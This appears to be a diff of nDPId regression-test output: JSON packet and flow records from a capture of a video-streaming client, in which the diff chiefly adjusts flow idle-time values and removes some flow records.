+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMMsAAAER0qXAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOp0AAAERyODAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} @@ -152,21 +152,21 @@ 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1470104379579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAD5AABAAEARs2DAqAVDwKj\/\/wCKAIoA5V88EQouRMCoBUMAigDPAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAANQAAAAAAAAAAAAAAAAAAAAAAAAA1AFYAAwABAAEAAgBGAFxNQUlMU0xPVFxCUk9XU0UADFDgkwQAV09SS0dST1VQAAAAAAAAAAQJABAAgA8BVapTQU5KSS1MSUZFQk9PSy1MSDUzMQA="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1470104379887,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104379887,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiDQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACATQ="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379916,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379916,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379916,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379916,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} 